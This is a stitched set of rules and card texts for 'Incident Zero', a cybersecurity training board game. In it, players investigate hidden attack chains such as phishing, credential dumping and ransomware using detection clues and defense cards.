| +1 | Real security tools/techniques | "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry" |
| +2 | Deployed Defense Persistence (v2.2) | A deployed defense's vector matches the targeted chain link |
| +0 | Vague/no justification | "Find suspicious activity" |
| Tracker | Starts At | Changes |
|---|---|---|
| Budget | 100 | -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when card revealed, -1 when auto-mitigated or Emergency Response used |
Changes for playtesters to validate, and why they were made:
Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.
Incident Response Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
docs/standalone-games/incident-response.md
Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Incident response training, attack detection practice, SOC operations
The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.
This is the foundation module—many other modules build upon successful or unsuccessful incident response.
Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.
| Difficulty | Chain Length | Budget | Turn Limit | Best For |
|---|---|---|---|---|
| Beginner | 3 cards | 100 | 7 turns | First playthrough, basic learning |
| Intermediate | 4 cards | 100 | 9 turns | Standard play, mixed experience |
| Advanced | 5 cards | 100 | 11 turns | Experienced players, challenge |
Create the Attack Chain:
1. Select 3-5 threat cards in logical sequence
2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL
3. Write down clues for each hidden card (don't reveal yet)
4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md
Recommended first-time scenario: - T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) - T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) - T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL) - Total: 3 cards, ~30 minutes, teaches full attack chain concept
Threat Orchestrator reads opening scenario based on only the first hidden card's clue. Example:
"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."
Each turn follows this structure:
1. START OF TURN - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free) - Read turn number aloud ("Turn 3...")
2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses strategy - Decides on ONE action (see below) - Announces action and parameters
3. ACTION RESOLUTION - Roll 1d20 for success/failure - Apply modifiers (see below) - Determine outcome
4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 Defense Card - Check if game won/lost
Cost: 5 Budget Roll Required: 11+ (on d20)
How it works: 1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs") 2. Provide technical justification for the investigation approach 3. Roll 1d20
Roll Modifiers: - +2 bonus: Strong technical justification (references specific logs, tools, or methodologies) - +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK) - No modifier: Vague investigation (0 to +0)
Examples of good justification: - "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds" - "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"
Outcomes (v2.2 — investigation successes accumulate): - Success (roll + modifiers ≥ 11): - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below) - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward - Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.
Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.
Cost: 10/15/25 Budget (depending on card tier) Roll Required: 11+ (on d20)
How it works: 1. Choose a Defense Card from your hand 2. Target a specific Asset or threat vector 3. Explain why this defense is appropriate for the situation 4. Roll 1d20
Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)
Outcomes: - Success (roll + modifiers ≥ 11): - If card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY! - If it matches but wrong step, or right step but wrong vector → Defense deployed but no reveal - If neither matches → Defense deployed but ineffective against current threat
Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.
Cost: 15 Budget (v2.2 — repriced from 25) Roll Required: None—this always succeeds
How it works: 1. Choose a previously revealed Threat Card still in play 2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.) 3. Card is immediately removed from play 4. Uncontained Threats penalty decreases by 1
Strategic Use: - Use this if you're running out of budget and accumulating penalties - Use this if a threat is too dangerous to leave active - Use this to prepare for later modules (e.g., if continuing to Hardening, fewer contained threats = more budget available)
How it works: 1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker) 2. At the START of each turn, deduct 5 Budget per uncontained threat 3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too) 4. When Emergency Response is used, remove that threat and decrement the tracker 5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)
Example (one action per turn; 3-card chain; Budget 100):
Turn 1: START → -5 Active Breach Cost (95)
Deploy Defense succeeds, full match → PHISHING REVEALED
(-10 for the BASIC defense, 85) → Uncontained Threats = 1
Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
...investigation continues toward the next chain card
Blue Team Wins if: - All threat cards in the attack chain are revealed - AND this happens within your turn limit (7/9/11 by chain length)
Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.
Blue Team Loses if: - Turn Tracker exceeds your turn limit with unrevealed cards remaining - OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)
If you want to score:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50
Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)
When your team successfully reveals a Threat Card:
Choose ONE reward:
FOR WINNERS: 1. "What was your investigation strategy? What worked?" 2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?" 3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"
FOR LOSERS: 1. "What went wrong in your investigation? Where did you get stuck?" 2. "Would you have benefited from more defense deployments vs. investigations?" 3. "How would you investigate differently if you could replay?"
EVERYONE: 1. "What was the attacker's complete kill chain?" 2. "Which threat card was hardest to detect? Why?" 3. "Why isn't this easy to detect in real-world networks?" 4. "What tool or process would have helped you detect faster?"
Poor clue (too vague): - "You find something suspicious"
Too good (gives it away): - "The attacker used Mimikatz to dump credentials from LSASS memory"
Just right (progressive disclosure): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."
The game is too easy if: - Teams reveal all cards in turns 1-4 with budget to spare - Clues are too specific - Teams succeed on every roll
The game is too hard if: - Teams get stuck after revealing 1 card - No successful rolls for 5+ turns - Teams hit the turn limit with only 1-2 cards revealed
Adjust by: - Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1) - Quality of clues (more/less specific) - Starting budget (60 vs. 100 vs. 120) - Turn limit (formula −1 for harder, formula +1 for easier)
If running this for a tournament or competitive context: - Assign different attack chains to each team (or same chain for scoring comparison) - Teams cannot see each other's progress - First team to reveal all cards wins - Tiebreaker: Most Budget remaining
Focus: Teaching full kill chain detection in 30 minutes
Focus: Sophisticated attack with multiple detection points
Focus: Complex supply-chain-initiated attack chain
If you won: - Continue to Hardening Module → Build defenses against discovered threats - Continue to Audit & Compliance Module → Verify your detection methods
If you lost: - Continue to Disaster Recovery Module → Manage the breach that succeeded - Replay with a different strategy - Try a different scenario
Standalone: Play again with a different attack chain
| Action | Cost | Roll | Success | Failure |
|---|---|---|---|---|
| Investigate | 5 Budget | roll + modifiers ≥ 11 | 1st success: clue; 2nd success on same link: reveal (v2.2) | No intel (budget wasted) |
| Deploy Defense | 10/15/25 | roll + modifiers ≥ 11 | Full match reveals card immediately | Defense not deployed |
| Emergency Response | 15 (v2.2) | None | Remove revealed threat | — |
| Modifier | Effect |
|---|---|
| +2 | Strong technical justification |
| +1 | Real tool/technique referenced |
| +2 | Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2) |
| Tracker | Starting | Changes |
|---|---|---|
| Budget | 100 | -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0 |
| Turn | 1 | +1 each turn (limit = chain × 2 + 1) |
| Uncontained Threats | 0 | +1 when revealed, -1 when contained or next card revealed |
For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.
Incident Response Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game
cards/incident-response/core-deck/threat-defense-cards.md
INITIAL COMPROMISE - First entry pointPIVOT & ESCALATE - Movement and privilege escalationPERSISTENCE - Maintaining accessC2 & EXFIL - Command & control and data theftSOCIAL ENGINEERINGWEB EXPLOITCREDENTIAL ABUSEMALWARENETWORKDATA EXFIL┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your security team reports that │
│ several employees have received │
│ emails claiming to be from your │
│ IT department requesting password │
│ resets. One user has already │
│ clicked the link. Email headers │
│ show the domain is spoofed." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Phishing exploits human psychology │
│ rather than technical vulnerabilities.│
│ Attackers use social engineering to │
│ create urgency and bypass technical │
│ controls. With email authentication │
│ (DMARC/SPF) and user training, this │
│ attack is highly preventable. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: WEB EXPLOIT │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "A popular industry blog your │
│ employees frequently visit has │
│ been compromised. Logs show that │
│ your users' browsers were │
│ redirected to a malicious domain │
│ hosting an exploit kit targeting │
│ unpatched browsers." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Watering hole attacks target │
│ trusted third-party sites to infect │
│ specific user groups. They bypass │
│ email filters and exploit browser │
│ vulnerabilities. Defense requires │
│ rapid patching and endpoint │
│ monitoring. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS │
├─────────────────────────────────────┤
│ Step: INITIAL COMPROMISE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your SIEM has detected a │
│ successful VPN login from an │
│ unusual geographic location at │
│ 3 AM. The username belongs to an │
│ employee who is currently on │
│ vacation. The login attempt came │
│ from an IP in a known cybercrime │
│ hosting provider." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Credential stuffing uses passwords │
│ leaked from third-party breaches. │
│ If employees reuse passwords, their │
│ work accounts become compromised. │
│ Multi-factor authentication (MFA) │
│ is the primary defense. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Network segmentation alerts show │
│ unusual SMB traffic between a │
│ compromised workstation and your │
│ file server. Suspicious named pipe │
│ activity detected. The attacker │
│ appears to be enumerating shares │
│ and attempting to access restricted │
│ resources." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ SMB (Server Message Block) is a │
│ legitimate protocol, so traffic │
│ blends in. Flat network architecture│
│ allows attackers to move freely. │
│ Without micro-segmentation and │
│ strong authentication, lateral │
│ movement is easy. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept │
│ exploit for an unpatched local │
│ privilege escalation vulnerability │
│ in the Windows kernel. Seconds │
│ later, the same process spawned a │
│ child running as SYSTEM. Patch │
│ reports show this host is three │
│ months behind on kernel updates." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Kernel exploits abuse memory- │
│ corruption or logic flaws (think │
│ Dirty Pipe or win32k CVEs) to jump │
│ from a standard user to SYSTEM or │
│ root. Public PoC code often appears │
│ within days of disclosure, so │
│ unpatched hosts are easy targets. │
│ Rapid patching, EDR behavioral │
│ detection, and least privilege │
│ limit the damage. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING │
├─────────────────────────────────────┤
│ Step: PIVOT & ESCALATE │
│ Vector: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Memory forensics analysis on the │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool │
│ has dumped credential hashes from │
│ memory. Several cached domain admin │
│ credentials have been extracted. │
│ Attacker now has credentials to │
│ move to critical systems." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Mimikatz attacks Windows LSASS │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials. │
│ Without proper Credential Guard and │
│ memory protection, domain admin │
│ credentials become compromised, │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE │
├─────────────────────────────────────┤
│ Step: PERSISTENCE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Log analysis shows a scheduled │
│ task created by the compromised │
│ account. The task is set to execute │
│ every 6 hours and runs a script │
│ from a hidden directory. The │
│ activity occurs outside normal │
│ business hours. Timestamp metadata │
│ indicates advanced timestomping." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Scheduled tasks run with privileges │
│ of the owner account and survive │
│ reboots. They blend in with │
│ legitimate administrative tasks. │
│ Windows Event Logs may not be │
│ forwarded centrally, allowing this │
│ persistence mechanism to hide. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE │
├─────────────────────────────────────┤
│ Step: PERSISTENCE │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Registry analysis detects a new │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual │
│ location. The binary has │
│ obfuscated metadata and a fake │
│ digital signature. It executes at │
│ every system startup." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Registry Run keys execute at startup│
│ with persistence across reboots. │
│ They're difficult to distinguish │
│ from legitimate startup programs. │
│ Endpoint detection solutions must │
│ actively monitor registry writes. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: NETWORK │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Your threat intelligence feed │
│ alerts on suspicious outbound │
│ HTTPS connections to a domain │
│ associated with known malware. │
│ Netflow shows regular 3-minute │
│ intervals of encrypted traffic. │
│ The pattern matches documented C2 │
│ beaconing behavior." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Beaconing establishes command and │
│ control communication with the │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection │
│ difficult. Threat intelligence and │
│ behavioral analysis (unusual timing)│
│ are required for detection. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Database audit logs show a large │
│ SELECT query executed by a service │
│ account retrieving customer data. │
│ Results (500k+ records) were piped │
│ to a temporary file. System logs │
│ show this file was copied to cloud │
│ storage via encrypted connection." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Database exfiltration bypasses │
│ endpoint controls. Attackers use │
│ legitimate protocols (HTTPS, SFTP) │
│ to trusted services (S3, Dropbox). │
│ Without DLP (Data Loss Prevention), │
│ and egress filtering, detection is │
│ nearly impossible. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: MALWARE │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "EDR alerts spike as multiple │
│ processes begin encrypting files │
│ on the file server. Hundreds of │
│ files change extension to '.locked'.│
│ A ransom note appears on all │
│ administrative workstations. Network│
│ traffic shows exfil before encryption│
│ began (double extortion tactic)." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Modern ransomware exfiltrates data │
│ first (to extort payment), then │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ THREAT CARD │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR │
├─────────────────────────────────────┤
│ Step: C2 & EXFIL │
│ Vector: DATA EXFIL │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR: │
│ "Browser logs show installation of │
│ a suspicious extension claiming to │
│ be a productivity tool. Traffic │
│ analysis reveals the extension is │
│ capturing keystrokes and session │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country." │
├─────────────────────────────────────┤
│ WHY THIS WORKS: │
│ Browser extensions run with full │
│ access to user activity. They can │
│ capture credentials, intercept │
│ HTTPS traffic (before encryption), │
│ and persist across browser updates. │
│ Extension vetting and endpoint │
│ protection are critical defenses. │
└─────────────────────────────────────┘
Defense cards counter specific Attack Vectors:
- SOCIAL ENGINEERING
- WEB EXPLOIT
- CREDENTIAL ABUSE
- MALWARE
- NETWORK
- DATA EXFIL
Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy SPF (Sender Policy │
│ Framework), DKIM (DomainKeys │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email │
│ spoofing. Implement enforcement │
│ policies to reject spoofed emails. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Blocks phishing emails claiming to │
│ be from your domain. Requires │
│ attackers to find alternative │
│ vectors. Also provides reporting on │
│ spoofing attempts. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing, │
│ urgency tactics, and credential │
│ harvesting attempts. Run simulated │
│ phishing campaigns. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first │
│ line of defense. Works best when │
│ combined with technical controls. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy automated Windows Update │
│ management across all systems. │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2 │
│ weeks). Audit compliance with patch │
│ reporting. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Closes browser and kernel │
│ vulnerabilities. Prevents watering │
│ hole and exploit kit attacks. │
│ Should be combined with vulnerability│
│ scanning to identify gaps. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy perimeter firewall rules to │
│ block unauthorized outbound │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business │
│ traffic. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents early-stage lateral │
│ movement and C2 beaconing. │
│ Slows attacker reconnaissance. │
│ Must be maintained with threat │
│ intelligence feeds. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy centralized log aggregation │
│ (syslog, Splunk, ELK). Forward │
│ Windows Event Logs, firewall logs, │
│ DNS queries, and proxy logs to │
│ central SIEM. Configure syslog │
│ integrity protection. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes local log tampering difficult.│
│ Provides investigative visibility │
│ into attacker activities. Foundation│
│ for threat hunting and compliance. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy signature-based antivirus │
│ across all endpoints. Enable │
│ automatic definition updates │
│ (daily). Configure real-time file │
│ and email scanning. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Catches known malware variants. │
│ Does not detect zero-day or │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement the 3-2-1 backup │
│ strategy: 3 copies of data, 2 │
│ different storage types, 1 offsite │
│ copy. Test restore procedures │
│ quarterly. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables rapid recovery from │
│ ransomware. Ensures data │
│ availability even if primary │
│ systems are compromised. Critical │
│ for business continuity. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS │
│ (BASIC - 10 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Establish an incident response │
│ program with detailed runbooks for │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware, │
│ insider threats, supply chain │
│ compromise. Include roles, │
│ responsibilities, and communication │
│ plans. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Enables faster, more coordinated │
│ response when incidents occur. │
│ Reduces confusion during high- │
│ pressure situations. Improves │
│ incident containment and recovery │
│ time. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy MFA for all remote access │
│ (VPN, RDP), email, and admin │
│ portals. Use authenticator apps or │
│ hardware tokens (not SMS). Enforce │
│ MFA on sensitive user accounts. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Makes compromised credentials │
│ useless without the second factor. │
│ Blocks credential stuffing attacks. │
│ Most effective single security │
│ measure against account takeover. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy EDR agent on all endpoints. │
│ Monitor process execution, file │
│ creation, registry modifications, │
│ and memory injection attempts. │
│ Enable behavioral analytics and │
│ automated response. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and │
│ threat hunting. Provides deep │
│ visibility into attack progression. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Implement VLANs and microsegmentation│
│ to separate user workstations from │
│ servers. Deploy firewall rules │
│ between segments. Implement zero- │
│ trust network access controls. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents lateral movement via SMB │
│ and other internal protocols. │
│ Limits blast radius of compromise. │
│ Forces attackers to find alternate │
│ paths. Combined with MFA, highly │
│ effective. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Create SIEM rules to detect attack │
│ patterns: failed login spikes, │
│ privilege escalation attempts, │
│ unusual process creation, scheduled │
│ task creation, and data exfil │
│ indicators. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Correlates events across logs to │
│ detect multi-step attacks. Reduces │
│ alert fatigue through smart │
│ aggregation. Enables faster │
│ investigation and response. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP) │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data │
│ (customer PII, source code, trade │
│ secrets). Block or alert on │
│ unauthorized transfers to cloud │
│ storage, email, USB, or external │
│ networks. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents SQL database exfiltration │
│ and bulk data theft. Detects │
│ unusual data access patterns. │
│ Enforces data security policies. │
│ Works best with strong authentication│
│ and encryption. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT │
│ (ADVANCED - 15 Budget) │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE │
├─────────────────────────────────────┤
│ DESCRIPTION: │
│ Deploy enterprise password vault │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement │
│ password rotation policies for │
│ service accounts. Enable audit │
│ logging for credential access. │
├─────────────────────────────────────┤
│ EFFECT: │
│ Prevents credential reuse attacks. │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation. │
└─────────────────────────────────────┘
┌─────────────────────────────────────┐
│ DEFENSE CARD │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS) │
